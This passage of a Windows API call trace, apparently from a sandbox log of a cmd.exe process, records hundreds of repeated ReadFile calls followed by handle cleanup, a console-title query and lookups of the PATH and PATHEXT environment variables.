lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, 
lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.995] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.995] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.995] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, 
lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.995] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: 
lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, 
lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, 
lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile 
(in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 
[0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, 
lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, 
lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: 
lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.038] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.038] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0203.038] _close (_FileHandle=3) returned 0 [0203.038] GetConsoleTitleW (in: lpConsoleTitle=0x12f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.039] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.039] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.039] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.039] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.039] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.039] _wcsicmp (_String1=".EXE", _String2=".CMD") 